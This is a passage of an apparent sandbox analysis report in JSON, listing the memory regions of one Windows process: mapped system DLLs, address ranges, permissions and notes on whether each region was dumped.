{ "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 4026367, "entry_point": 3604480, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1166", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 3604480, "timestamp": "00:01:31.715", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5898240, "type": "region", "version": 1 }, "end_va": 5963775, "entry_point": 0, "filename": null, "id": "region_1167", "name": "private_0x00000000005a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5898240, "timestamp": "00:01:31.715", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1970995200, "type": "region", "version": 1 }, "end_va": 1971044351, "entry_point": 1970999521, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1168", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1970995200, "timestamp": "00:01:31.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971453951, "entry_point": 1971168179, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1169", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:01:31.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1971716096, "type": "region", "version": 1 }, "end_va": 1972420607, "entry_point": 1971758194, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1170", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1971716096, "timestamp": "00:01:31.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1975123968, "type": "region", "version": 1 }, "end_va": 1976172543, "entry_point": 1975236333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1171", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1975123968, "timestamp": "00:01:31.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989672959, "entry_point": 1989174083, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1172", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:01:31.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991548927, "entry_point": 1991521952, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1173", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:31.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1991573504, "type": "region", "version": 1 }, "end_va": 1992228863, "entry_point": 1991657957, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1174", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1991573504, "timestamp": "00:01:31.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1992228864, "type": "region", "version": 1 }, "end_va": 1993211903, "entry_point": 1992295785, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1175", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1992228864, "timestamp": "00:01:31.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1993801728, "type": "region", "version": 1 }, "end_va": 1994088447, "entry_point": 1993831544, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1176", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1993801728, "timestamp": "00:01:31.721", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994129408, "type": "region", "version": 1 }, "end_va": 1994772479, "entry_point": 1994342359, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1177", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994129408, "timestamp": "00:01:31.721", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1995309056, "type": "region", "version": 1 }, "end_va": 1995411455, "entry_point": 1995327861, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1178", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1995309056, "timestamp": "00:01:31.722", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1995440128, "type": "region", "version": 1 }, "end_va": 1996554239, "entry_point": 1995518675, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1179", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1995440128, "timestamp": "00:01:31.722", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1998651392, "type": "region", "version": 1 }, "end_va": 2000076799, "entry_point": 1998961213, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1180", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1998651392, "timestamp": "00:01:31.723", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2005270528, "type": "region", "version": 1 }, "end_va": 2006294527, "entry_point": 0, "filename": null, "id": "region_1181", "name": "private_0x0000000077860000", "norm_filename": null, "region_type": "private_memory", "start_va": 2005270528, "timestamp": "00:01:31.723", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2006319104, "type": "region", "version": 1 }, "end_va": 2007494655, "entry_point": 0, "filename": null, "id": "region_1182", "name": "private_0x0000000077960000", "norm_filename": null, "region_type": "private_memory", "start_va": 2006319104, "timestamp": "00:01:31.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1183", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:31.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1184", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:31.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 5668863, "entry_point": 0, "filename": null, "id": "region_1185", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:01:31.727", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1990197248, "type": "region", "version": 1 }, "end_va": 1991032831, "entry_point": 1990203019, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1186", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1990197248, "timestamp": "00:01:31.728", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 2001141760, "type": "region", "version": 1 }, "end_va": 2001534975, "entry_point": 2001212815, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1187", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2001141760, "timestamp": "00:01:31.728", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1188", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:31.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_1189", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:31.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 7540735, "entry_point": 0, "filename": null, "id": "region_1190", "name": "pagefile_0x00000000005b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5963776, "timestamp": "00:01:31.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10878976, "type": "region", "version": 1 }, "end_va": 31850495, "entry_point": 0, "filename": null, "id": "region_1191", "name": "pagefile_0x0000000000a60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10878976, "timestamp": "00:01:31.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36884480, "start_va": 31850496, "type": "region", "version": 1 }, "end_va": 68734975, "entry_point": 0, "filename": null, "id": "region_1192", "name": "private_0x0000000001e60000", "norm_filename": null, "region_type": "private_memory", "start_va": 31850496, "timestamp": "00:01:31.735", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1971453952, "type": "region", "version": 1 }, "end_va": 1971671039, "entry_point": 1971459165, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_1193", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1971453952, "timestamp": "00:01:31.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 2003632128, "type": "region", "version": 1 }, "end_va": 2003656703, "entry_point": 2003638146, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_1194", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 2003632128, "timestamp": "00:01:31.737", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001195-addr_0x0000000000740000-size_0x0000000000130000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_273", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1245184, "start_va": 7602176, "type": "region", "version": 1 }, "end_va": 8847359, "entry_point": 0, "filename": null, "id": "region_1195", "name": "private_0x0000000000740000", "norm_filename": null, "region_type": "private_memory", "start_va": 7602176, "timestamp": "00:01:31.738", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004054015, "entry_point": 2003803046, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1196", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:31.739", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 2000093184, "type": "region", "version": 1 }, "end_va": 2001096703, "entry_point": 2000099429, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_1197", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 2000093184, "timestamp": "00:01:31.741", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 2002321408, "type": "region", "version": 1 }, "end_va": 2003591167, "entry_point": 2002328373, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_1198", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 2002321408, "timestamp": "00:01:31.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1993211904, "type": "region", "version": 1 }, "end_va": 1993797631, "entry_point": 1993228209, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_1199", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1993211904, "timestamp": "00:01:31.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 2004090880, "type": "region", "version": 1 }, "end_va": 2005258239, "entry_point": 2004096394, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_1200", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 2004090880, "timestamp": "00:01:31.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 2009268224, "type": "region", "version": 1 }, "end_va": 2009317375, "entry_point": 2009277326, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_1201", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 2009268224, "timestamp": "00:01:31.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1973026816, "type": "region", "version": 1 }, "end_va": 1975103487, "entry_point": 1973035737, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_1202", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1973026816, "timestamp": "00:01:31.746", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 1991245824, "type": "region", "version": 1 }, "end_va": 1991417855, "entry_point": 1991250682, "filename": "\\Windows\\SysWOW64\\imagehlp.dll", "id": "region_1203", "name": "imagehlp.dll", "norm_filename": "c:\\windows\\syswow64\\imagehlp.dll", "region_type": "memory_mapped_file", "start_va": 1991245824, "timestamp": "00:01:31.749", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001204-addr_0x0000000000870000-size_0x0000000000130000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_274", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1245184, "start_va": 8847360, "type": "region", "version": 1 }, "end_va": 10092543, "entry_point": 0, "filename": null, "id": "region_1204", "name": "private_0x0000000000870000", "norm_filename": null, "region_type": "private_memory", "start_va": 8847360, "timestamp": "00:01:31.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970434047, "entry_point": 1970347165, "filename": "\\Windows\\SysWOW64\\userenv.dll", "id": "region_1205", "name": "userenv.dll", "norm_filename": "c:\\windows\\syswow64\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:01:31.751", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1970274304, "type": "region", "version": 1 }, "end_va": 1970319359, "entry_point": 1970280850, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_1206", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1970274304, "timestamp": "00:01:31.752", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 68747264, "type": "region", "version": 1 }, "end_va": 71692287, "entry_point": 68747264, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1207", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 68747264, "timestamp": "00:01:32.195", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001208-addr_0x0000000000210000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_275", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_1208", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:32.200", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001209-addr_0x0000000000890000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_276", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 8978432, "type": "region", "version": 1 }, "end_va": 9240575, "entry_point": 0, "filename": null, "id": "region_1209", "name": "private_0x0000000000890000", "norm_filename": null, "region_type": "private_memory", "start_va": 8978432, "timestamp": "00:01:32.201", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9830400, "type": "region", "version": 1 }, "end_va": 10092543, "entry_point": 0, "filename": null, "id": "region_1210", "name": "private_0x0000000000960000", "norm_filename": null, "region_type": "private_memory", "start_va": 9830400, "timestamp": "00:01:32.201", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001211-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_277", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_1211", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:32.201", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1946484735, "entry_point": 1946040265, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_1212", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:32.203", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001213-addr_0x0000000004460000-size_0x0000000000210000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_278", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2162688, "start_va": 71696384, "type": "region", "version": 1 }, "end_va": 73859071, "entry_point": 0, "filename": null, "id": "region_1213", "name": "private_0x0000000004460000", "norm_filename": null, "region_type": "private_memory", "start_va": 71696384, "timestamp": "00:01:32.204", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 7602176, "type": "region", "version": 1 }, "end_va": 8515583, "entry_point": 0, "filename": null, "id": "region_1214", "name": "pagefile_0x0000000000740000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7602176, "timestamp": "00:01:32.211", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8585216, "type": "region", "version": 1 }, "end_va": 8847359, "entry_point": 0, "filename": null, "id": "region_1215", "name": "private_0x0000000000830000", "norm_filename": null, "region_type": "private_memory", "start_va": 8585216, "timestamp": "00:01:32.212", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 720895, "entry_point": 0, "filename": null, "id": "region_1216", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:32.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2097151, "entry_point": 0, "filename": null, "id": "region_1217", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:01:32.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9437184, "type": "region", "version": 1 }, "end_va": 9699327, "entry_point": 0, "filename": null, "id": "region_1218", "name": "private_0x0000000000900000", "norm_filename": null, "region_type": "private_memory", "start_va": 9437184, "timestamp": "00:01:32.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 72024064, "type": "region", "version": 1 }, "end_va": 72286207, "entry_point": 0, "filename": null, "id": "region_1219", "name": "private_0x00000000044b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 72024064, "timestamp": "00:01:32.222", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 73596928, "type": "region", "version": 1 }, "end_va": 73859071, "entry_point": 0, "filename": null, "id": "region_1220", "name": "private_0x0000000004630000", "norm_filename": null, "region_type": "private_memory", "start_va": 73596928, "timestamp": "00:01:32.222", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_1221", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:32.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1222", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:32.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 729087, "entry_point": 0, "filename": null, "id": "region_1223", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:01:32.243", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1968570368, "type": "region", "version": 1 }, "end_va": 1970266111, "entry_point": 1968760501, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1224", "name": "comctl32.dll", "norm_filename": 